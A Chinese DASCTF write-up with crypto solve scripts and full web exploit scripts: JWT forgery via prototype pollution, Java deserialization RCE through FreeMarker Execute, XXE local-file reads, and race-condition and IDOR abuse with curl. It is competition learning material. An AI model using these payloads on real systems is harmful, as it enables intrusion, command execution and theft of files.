前言
rank11 忘记写wp到博客上面了捏,这个得分级制很抽象,感觉就是为了agent打造的,这次一个人单挑,crypto+web手搓,二进制是ai直接ak的,现在的ai还是tql
Crypto
lattice_oracle
m1 使用模数 n1 = p * q 进行加密 m2 使用模数 n2 = q * r 进行加密 m3 使用模数 n3 = p * r 进行加密 那么
- p^2 = n1 * n3 / n2
- q^2 = n1 * n2 / n3
- r^2 = n2 * n3 / n1
- p = isqrt(n1 * n3 // n2)
- q = isqrt(n1 * n2 // n3)
- r = isqrt(n2 * n3 // n1) 然后就可以求出flag了
from math import isqrt
from Crypto.Util.number import long_to_bytes
n1 =n2 =n3 =e = 65537c1 =c2 =c3 =
def exact_square_root(value: int) -> int: root = isqrt(value) if root * root != value: raise ValueError("value is not a perfect square") return root
def recover_prime(a: int, b: int, c: int) -> int: return exact_square_root(a * b // c)
def decrypt_part(ciphertext: int, p: int, q: int) -> bytes: phi = (p - 1) * (q - 1) d = pow(e, -1, phi) return long_to_bytes(pow(ciphertext, d, p * q))
def main() -> None: p = recover_prime(n1, n3, n2) q = recover_prime(n1, n2, n3) r = recover_prime(n2, n3, n1)
m1 = decrypt_part(c1, p, q) m2 = decrypt_part(c2, q, r) m3 = decrypt_part(c3, p, r) flag = m1 + m2 + m3
print(f"p = {p}") print(f"q = {q}") print(f"r = {r}") print(f"flag = {flag.decode()}")
if __name__ == "__main__": main()three_friends
一个lwe,主要在于key = hashlib.sha256(str(s).encode()).digest()[:16]
满足b_i = <a_i, s> + e_i (mod 97)
可以重写成<a_i, s> + e_i - b_i = 97 * k_i
那么就可以用z3求解
import jsonimport hashlib
from Crypto.Cipher import AESfrom z3 import Int, Solver, sat
def pkcs7_unpad(data: bytes) -> bytes: pad_len = data[-1] if pad_len == 0 or pad_len > 16: raise ValueError("invalid padding length") if data[-pad_len:] != bytes([pad_len]) * pad_len: raise ValueError("invalid padding bytes") return data[:-pad_len]
def main() -> None: with open("data.txt", "r", encoding="utf-8") as f: data = json.load(f)
n = data["n"] q = data["q"] A = data["A"] b = data["b"]
s_vars = [Int(f"s_{i}") for i in range(n)] err_vars = [Int(f"e_{i}") for i in range(len(A))] wrap_vars = [Int(f"k_{i}") for i in range(len(A))]
solver = Solver()
for s_var in s_vars: solver.add(s_var >= 0, s_var <= 3)
for row, target, err_var, wrap_var in zip(A, b, err_vars, wrap_vars): solver.add(err_var >= -1, err_var <= 1) solver.add(sum(coeff * var for coeff, var in zip(row, s_vars)) + err_var - target == q * wrap_var)
if solver.check() != sat: raise RuntimeError("no solution found")
model = solver.model() secret = [model.eval(var).as_long() for var in s_vars] errors = [model.eval(var).as_long() for var in err_vars]
key = hashlib.sha256(str(secret).encode()).digest()[:16] iv = bytes.fromhex(data["iv"]) enc = bytes.fromhex(data["enc"]) plaintext = pkcs7_unpad(AES.new(key, AES.MODE_CBC, iv).decrypt(enc))
print(f"secret = {secret}") print(f"errors = {errors}") print(f"flag = {plaintext.decode()}")
if __name__ == "__main__": main()phantom_sign
用的secp256k1 曲线的 ECDSA 签名算法
s_i = k_i^{-1} (h_i + d * r_i) mod n
这意味着每个随机数只有 248 位,而 secp256k1 的随机数通常最高可达 256 位。因此,其最高 8 位已知全为 0
那么就是HNP了
ECDSA方程为k_i = s_i^{-1} r_i * d + s_i^{-1} h_i mod n
定义两个变量
A_i = s_i^{-1} r_i mod nB_i = s_i^{-1} h_i mod n就变成了k_i = A_i * d + B_i + l_i * nk有范围0 <= k_i < 2^248 打格求解
import jsonimport hashlib
from Crypto.Cipher import AESfrom Crypto.Util.Padding import unpadfrom Crypto.Util.number import long_to_bytesfrom sage.all import QQ, ZZ, EllipticCurve, GF, matrix
class PartialInteger: def __init__(self): self.bit_length = 0 self.unknowns = 0 self._components = []
def add_known(self, value, bit_length): self.bit_length += bit_length self._components.append((value, bit_length)) return self
def add_unknown(self, bit_length): self.bit_length += bit_length self.unknowns += 1 self._components.append((None, bit_length)) return self
def get_known_msb(self): msb = 0 msb_bit_length = 0 for value, bit_length in reversed(self._components): if value is None: return msb, msb_bit_length msb = (msb << bit_length) + value msb_bit_length += bit_length return msb, msb_bit_length
def get_unknown_lsb(self): lsb_bit_length = 0 for value, bit_length in self._components: if value is not None: return lsb_bit_length lsb_bit_length += bit_length return lsb_bit_length
def sub(self, unknowns): assert len(unknowns) == self.unknowns i = 0 j = 0 shift = 0 for value, bit_length in self._components: if value is None: i += 2 ** shift * unknowns[j] j += 1 else: i += value << shift shift += bit_length return i
@staticmethod def from_msb(bit_length, msb, msb_bit_length): return PartialInteger().add_unknown(bit_length - msb_bit_length).add_known(msb, msb_bit_length)
def shortest_vectors(B): for row in B.LLL().rows(): if not row.is_zero(): yield row
def hnp_attack(a, b, modulus, bound): rows = len(a) cols = len(a[0]) basis = matrix(QQ, rows + cols + 1, rows + cols + 1)
for i in range(rows): for j in range(cols): basis[rows + j, i] = a[i][j] basis[i, i] = modulus basis[rows + cols, i] = b[i] - bound // 2
for j in range(cols): basis[rows + j, rows + j] = bound / QQ(modulus)
basis[rows + cols, rows + cols] = bound
for v in shortest_vectors(basis): xs = [int(v[i] + bound // 2) for i in range(rows)] ys = [(int(v[rows + j] * modulus) // bound) % modulus for j in range(cols)] if all(y != 0 for y in ys) and v[rows + cols] == bound: yield xs, ys
def recover_private_key(order_n, hashes, rs, ss): partial_nonces = [PartialInteger.from_msb(256, 0, 8) for _ in hashes] a = [] b = [] bound = 0
for h_i, r_i, s_i, k_i in zip(hashes, rs, ss, partial_nonces): msb, _ = k_i.get_known_msb() shift = 2 ** k_i.get_unknown_lsb() s_inv = pow(int(s_i), -1, int(order_n)) a.append([ZZ((s_inv * r_i) % order_n)]) b.append(ZZ((s_inv * h_i - shift * msb) % order_n)) bound = max(bound, shift)
for nonce_suffixes, secrets in hnp_attack(a, b, order_n, bound): private_key = ZZ(secrets[0]) nonces = [ZZ(k_i.sub([suffix])) for k_i, suffix in zip(partial_nonces, nonce_suffixes)] return private_key, nonces
raise ValueError("failed to recover private key")
def verify_public_key(data, private_key): p = ZZ(data["curve"]["p"]) a = ZZ(data["curve"]["a"]) b = ZZ(data["curve"]["b"]) gx = ZZ(data["curve"]["Gx"]) gy = ZZ(data["curve"]["Gy"]) qx = ZZ(data["Q"][0]) qy = ZZ(data["Q"][1])
curve = EllipticCurve(GF(p), [a, b]) G = curve(gx, gy) Q = ZZ(private_key) * G return ZZ(Q[0]) == qx and ZZ(Q[1]) == qy
def decrypt_flag(private_key, iv_hex, enc_hex): key = hashlib.sha256(long_to_bytes(int(private_key))).digest()[:16] iv = bytes.fromhex(iv_hex) enc = bytes.fromhex(enc_hex) cipher = AES.new(key, AES.MODE_CBC, iv) return unpad(cipher.decrypt(enc), 16)
def main(): with open("data.json", "r") as f: data = json.load(f)
n = ZZ(data["curve"]["n"]) hashes = [ZZ(sig[0]) for sig in data["signatures"]] rs = [ZZ(sig[1]) for sig in data["signatures"]] ss = [ZZ(sig[2]) for sig in data["signatures"]]
private_key, nonces = recover_private_key(n, hashes, rs, ss) if not verify_public_key(data, private_key): raise ValueError("recovered key does not match public key Q")
flag = decrypt_flag(private_key, data["iv"], data["enc"]).decode()
print(f"private key d = {private_key}") print(f"first nonce k0 = {nonces[0]}") print(flag)
if __name__ == "__main__": main()Web
CorpGate
- 注册普通用户拿到合法 token
- 利用 /api/settings 的递归合并做原型污染
- 污染 Object.prototype.pending
- 调用 /api/system/healthcheck 触发 configRefresh()
- 服务端把继承来的 pending 当成待轮转 JWT 密钥,更新 signingState.active
- 用我们指定的密钥自签 role=admin 的 JWT
- 访问 /admin 拿一次性 reference
- 调用 /api/reports/execute 执行 /readflag
utils/merge.js
- deepMerge() 只在 depth < 3 时阻止 constructor/prototype
- 用户设置对象里本来就有 notifications.digest.channels
- 因此可以走到第 3 层之后再写入 constructor.prototype.pending 利用数据如下:
{ "notifications": { "digest": { "channels": { "constructor": { "prototype": { "pending": "ctf-admin-secret" } } } } }}这会导致:
Object.prototype.pending = “ctf-admin-secret”
config.js
- configRefresh() 里 rotation 是普通对象:var rotation = {};
- 随后判断 if (rotation.pending),会读取原型链属性
- 命中后执行:
signingState.active = rotation.pending;signingState.version++;这样 JWT 签名密钥就被我们控制了。 middleware/auth.js
- authMiddleware 固定用 HS256
- adminMiddleware 只检查 req.user.role === ‘admin’
- 不校验用户是否真实存在于 users 表里 因此可以直接伪造:
{ "id": "admin-id", "username": "admin", "role": "admin"}const https = require('https');const querystring = require('querystring');const jwt = require('jsonwebtoken');
const target = process.argv[2] || 'https://16776804.tcp-ctf2.dasctf.com:9999';const secret = 'ctf-admin-secret';const username = 'u' + Math.random().toString(16).slice(2, 10);const password = 'pass1234';
function request(method, path, options = {}) { const url = new URL(path, target); const headers = Object.assign({}, options.headers || {}); let body = options.body || '';
if (body && !headers['Content-Length']) { headers['Content-Length'] = Buffer.byteLength(body); }
return new Promise((resolve, reject) => { const req = https.request( { protocol: url.protocol, hostname: url.hostname, port: url.port, path: url.pathname + url.search, method, headers, rejectUnauthorized: false, }, (res) => { const chunks = []; res.on('data', (chunk) => chunks.push(chunk)); res.on('end', () => { resolve({ statusCode: res.statusCode, headers: res.headers, body: Buffer.concat(chunks).toString(), }); }); } );
req.on('error', reject); if (body) req.write(body); req.end(); });}
function getCookie(setCookieHeader) { if (!setCookieHeader || !setCookieHeader.length) { throw new Error('missing set-cookie header'); } return setCookieHeader[0].split(';')[0];}
async function main() { const registerBody = querystring.stringify({ username, password, email: username + '@corp.local', department: 'Engineering', }); const registerRes = await request('POST', '/register', { headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: registerBody, }); const userCookie = getCookie(registerRes.headers['set-cookie']);
const pollutionPayload = JSON.stringify({ notifications: { digest: { channels: { constructor: { prototype: { pending: secret, }, }, }, }, }, }); const settingsRes = await request('POST', '/api/settings', { headers: { 'Content-Type': 'application/json', Cookie: userCookie, }, body: pollutionPayload, }); if (settingsRes.statusCode !== 200) { throw new Error('settings update failed: ' + settingsRes.statusCode + ' ' + settingsRes.body); }
const healthRes = await request('GET', '/api/system/healthcheck'); const health = JSON.parse(healthRes.body); if (!health.rotated) { throw new Error('key rotation did not happen: ' + healthRes.body); }
const forgedToken = jwt.sign( { id: 'admin-id', username: 'admin', role: 'admin', }, secret, { algorithm: 'HS256', expiresIn: '24h', } ); const adminCookie = 'token=' + forgedToken;
const adminRes = await request('GET', '/admin', { headers: { Cookie: adminCookie, }, }); const referenceMatch = adminRes.body.match(/Report Reference:\s*<strong>([0-9a-f]+)<\/strong>/); if (!referenceMatch) { throw new Error('could not extract reference from admin page'); } const reference = referenceMatch[1];
const reportRes = await request('POST', '/api/reports/execute', { headers: { 'Content-Type': 'application/json', Cookie: adminCookie, }, body: JSON.stringify({ reference }), }); const report = JSON.parse(reportRes.body);
console.log('target=' + target); console.log('user=' + username); console.log('reference=' + reference); console.log('flag=' + report.report);}
main().catch((err) => { console.error(err.message); process.exit(1);});TaxManager
/api/profile/update会遍历用户提交的 JSON 键值对,并通过反射直接写入User` 对象字段。
- 只禁止修改: id, username, password
- 仅额外拦截 role=admin
- 没有拦截 role=reviewer 因此普通用户可以把自己从 taxpayer 提升为 reviewer。 /api/review 允许 reviewer/admin 在审批退款时提交 attachmentData。
- 签名算法: HmacSHA256
- 密钥来自配置文件硬编码值
- 结果用 Base64 比较 因此可以为任意恶意 attachmentData 生成合法 X-Signature。 /api/export/generate 会对退款记录中的 voucherData 调用:
- SerializeUtil.deserialize(voucherData) 内部直接使用 ObjectInputStream.readObject(),没有任何白名单或过滤。 应用自带一条可利用链:
- ScheduledTaskHandler.readObject()
- 遍历 taskQueue
- 对其中的 Runnable 调用 run()
- ReportJob.run()
- PdfReportGenerator.render(template)
- FreeMarker 模板支持 freemarker.template.utility.Execute 因此可以在反序列化阶段直接执行系统命令。 /api/import/history使用DocumentBuilderFactory.newInstance()` 解析 XML,未禁用外部实体。 可通过 XXE 读取本地文件。虽然接口对 flag 关键字和敏感内容有额外拦截,但把结果先 base64 落到 /tmp 后仍可稳定回读。
- 注册并登录普通用户
- 调用 /api/profile/update 把 role 改成 reviewer
- 构造恶意序列化对象 ScheduledTaskHandler -> ReportJob -> FreeMarker Execute
- 用硬编码密钥计算 attachmentData 的 HMAC 签名
- 调用 /api/review 审批退款,把恶意 voucherData 写入记录
- 调用 /api/export/prepare 和 /api/export/generate 触发反序列化
- 执行命令:
- openssl base64 -A -in /flag.txt -out /tmp/taxb64
- 再通过 XXE 读取 /tmp/taxb64 并解码得到 flag
import base64import hashlibimport hmacimport jsonimport randomimport stringimport subprocessimport urllib.errorimport urllib.request
BASE_URL = "http://b8820b71.http-ctf2.dasctf.com:80"SECRET = "TaxManager_Secret_K3y_2026_Un1que"JAVA_CP = ".:extracted/BOOT-INF/classes:extracted/BOOT-INF/lib/*"
def build_opener(): return urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
def random_suffix(): return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8))
def request_json(opener, method, path, data=None, headers=None): body = None merged_headers = {} if headers: merged_headers.update(headers) if data is not None: body = json.dumps(data).encode() merged_headers.setdefault("Content-Type", "application/json") req = urllib.request.Request(BASE_URL + path, data=body, headers=merged_headers, method=method) with opener.open(req) as resp: return json.loads(resp.read().decode())
def request_xml(opener, path, xml_text): req = urllib.request.Request( BASE_URL + path, data=xml_text.encode(), headers={"Content-Type": "application/xml"}, ) with opener.open(req) as resp: return json.loads(resp.read().decode())
def register_and_login(opener): suffix = random_suffix() username = f"u_{suffix}" password = f"p_{suffix}" taxpayer_id = f"TAX_{suffix}"
register_resp = request_json( opener, "POST", "/api/register", {"username": username, "password": password, "taxpayerId": taxpayer_id}, ) login_resp = request_json( opener, "POST", "/api/login", {"username": username, "password": password}, ) if not register_resp.get("success") or not login_resp.get("success"): raise RuntimeError(f"register/login failed: {register_resp} / {login_resp}") return username, password
def xxe_read(opener, target_path): xml = f"""<?xml version="1.0"?><!DOCTYPE x [<!ENTITY e SYSTEM "file://{target_path}">]><history><taxpayerId>&e;</taxpayerId></history>""" resp = request_xml(opener, "/api/import/history", xml) prefix = "History imported successfully for taxpayer: " if resp.get("success") and resp.get("message", "").startswith(prefix): return resp["message"][len(prefix):] return json.dumps(resp, ensure_ascii=False)
def promote_to_reviewer(opener): resp = request_json(opener, "POST", "/api/profile/update", {"role": "reviewer"}) if not resp.get("success"): raise RuntimeError(f"role update failed: {resp}") profile = request_json(opener, "GET", "/api/profile") if profile.get("role") != "reviewer": raise RuntimeError(f"unexpected role after update: {profile}") return profile
def apply_refund(opener, amount="8888.88", tax_year="2025", reason="review"): resp = request_json( opener, "POST", "/api/refund/apply", {"amount": amount, "taxYear": tax_year, "reason": reason}, ) if not resp.get("success"): raise RuntimeError(f"apply refund failed: {resp}") return int(resp["id"])
def build_payload(template): result = subprocess.run( ["java", "-cp", JAVA_CP, "PayloadBuilder", "payload", template], check=True, capture_output=True, text=True, ) return result.stdout.strip()
def sign_attachment(attachment_data): return base64.b64encode( hmac.new(SECRET.encode(), attachment_data.encode(), hashlib.sha256).digest() ).decode()
def approve_with_payload(opener, refund_id, attachment_data): signature = sign_attachment(attachment_data) resp = request_json( opener, "POST", "/api/review", {"refundId": refund_id, "action": "approve", "attachmentData": attachment_data}, {"X-Signature": signature}, ) if not resp.get("success"): raise RuntimeError(f"approve failed: {resp}") return resp
def trigger_export(opener, refund_id): prep = request_json(opener, "POST", "/api/export/prepare", {"refundId": refund_id}) if not prep.get("success"): raise RuntimeError(f"prepare export failed: {prep}") gen = request_json( opener, "POST", "/api/export/generate", {"refundId": refund_id, "exportToken": prep["exportToken"]}, ) return prep, gen
def run_command_via_deser(opener, command): template = f'<#assign ex="freemarker.template.utility.Execute"?new()>${{ex("{command}")}}' payload = build_payload(template) refund_id = apply_refund(opener) approve_resp = approve_with_payload(opener, refund_id, payload) prep_resp, gen_resp = trigger_export(opener, refund_id) return { "refund_id": refund_id, "approve": approve_resp, "prepare": prep_resp, "generate": gen_resp, }
def main(): opener = build_opener() username, password = register_and_login(opener) print(f"[*] creds: {username}:{password}")
profile = promote_to_reviewer(opener) print(f"[*] promoted role: {profile['role']}")
commands = [ ("openssl base64 -A -in /etc/hostname -out /tmp/taxb64", "/tmp/taxb64", True), ("openssl base64 -A -in /flag -out /tmp/taxb64", "/tmp/taxb64", True), ("openssl base64 -A -in /flag.txt -out /tmp/taxb64", "/tmp/taxb64", True), ("openssl base64 -A -in /app/flag -out /tmp/taxb64", "/tmp/taxb64", True), ("openssl base64 -A -in /app/flag.txt -out /tmp/taxb64", "/tmp/taxb64", True), ("openssl base64 -A -in /tmp/flag -out /tmp/taxb64", "/tmp/taxb64", True), ("openssl base64 -A -in /tmp/flag.txt -out /tmp/taxb64", "/tmp/taxb64", True), ]
for command, read_path, is_base64 in commands: print(f"[*] exec: {command}") run = run_command_via_deser(opener, command) print("[*] export result:", json.dumps(run["generate"], ensure_ascii=False)) content = xxe_read(opener, read_path).strip() print(f"[*] read {read_path}: {content}") if is_base64 and content and not content.startswith("{"): try: decoded = base64.b64decode(content).decode(errors="replace") print(f"[*] decoded {read_path}: {decoded}") except Exception as exc: print(f"[*] decode failed: {exc}")
if __name__ == "__main__": main()InkVerse
这题的核心链路是:
- 发现隐藏接口文档 /api/docs
- 找到 POST /api/tip 的竞争条件
- 并发刷 tip,把普通用户提升成 reviewer
- 使用 reviewer 权限导出一篇已发布文章,拿到 Feature-Token
- 提交 feature 请求,让 tester456 的文章变成 Featured
- 登录 tester456,访问 /bulletin
- 在 Featured Author Rewards 公告里拿到 flag 存在文章 IDOR,普通用户可以直接访问某些未公开文章,例如:
- /article/5
- /article/6 其中 article/6 是 tester456 的文章,内容是 {{7*7}}。 POST /api/tip 正常逻辑是给文章打赏并增加作者声望。 串行请求时,作者声望最多涨到 40,无法正常达到 reviewer 所需的 50。 但是这个接口有竞争条件:并发请求时,服务端对余额/声望的检查和更新不是原子的,可以把作者声望冲过 50。 利用方式:
- 注册普通用户
- 找一篇公开文章,例如 article_id=1
- 对 /api/tip 发大量并发请求
- 再调用 /api/user/info 检查角色 成功后用户会被提升为:
- role: reviewer 当时拿到的稳定 reviewer 会话对应用户是:
- roleprobe3 先把 article/6 审核通过:
curl —resolve 05ac1b8d.http-ctf2.dasctf.com:80:198.18.0.194
-H ‘Cookie: session=<reviewer_session>’
-H ‘Content-Type: application/json’
—data-binary ’{“article_id”:6,“action”:“approve”}’
http://05ac1b8d.http-ctf2.dasctf.com:80/api/review/single
拿到
{“message”:“Article approved”}
然后对已发布的 article/6 发起导出:
curl —resolve 05ac1b8d.http-ctf2.dasctf.com:80:198.18.0.194
-H ‘Cookie: session=<reviewer_session>’
-H ‘Content-Type: application/json’
—data-binary ’{“article_id”:6}’
http://05ac1b8d.http-ctf2.dasctf.com:80/api/export
检查状态:
curl —resolve 05ac1b8d.http-ctf2.dasctf.com:80:198.18.0.194
-H ‘Cookie: session=<reviewer_session>’
http://05ac1b8d.http-ctf2.dasctf.com:80/api/export/status
拿到导出文件名后访问:
- /exports/export_1_6.txt 导出内容里有一行非常关键:
Feature-Token: b085b0c0479340b6df34e1c5caba3de15d2edeb7395e101743c5a735f26aca5c
用这个 token 调用:
curl —resolve 05ac1b8d.http-ctf2.dasctf.com:80:198.18.0.194
-H ‘Cookie: session=<reviewer_session>’
-H ‘Content-Type: application/json’
—data-binary ’{“article_id”:6,“signature”:“b085b0c0479340b6df34e1c5caba3de15d2edeb7395e101743c5a735f26aca5c”}’
http://05ac1b8d.http-ctf2.dasctf.com:80/api/review/feature
查询状态:
curl —resolve 05ac1b8d.http-ctf2.dasctf.com:80:198.18.0.194
-H ‘Cookie: session=<reviewer_session>’
‘http://05ac1b8d.http-ctf2.dasctf.com:80/api/review/feature/status?article_id=6’
状态变成:
{“status”:“approved”}
此时主页和文章页都能看到 article/6 已带有 Featured 标记。 关键点在于:article/6 的作者 tester456 成为了 featured author。 直接登录:
- 用户名:tester456
- 密码:tester456 登录后访问:
- /bulletin 页面会出现一条仅 featured author 可见的公告:
- Featured Author Rewards 其中直接给出 flag:
DASCTF{cc401a2d-d676-4270-bcd6-1c48ad259501}
总结
crypto和web的质量还是很不错的,但是agent的冲击下,真的没什么游戏体验
部分信息可能已经过时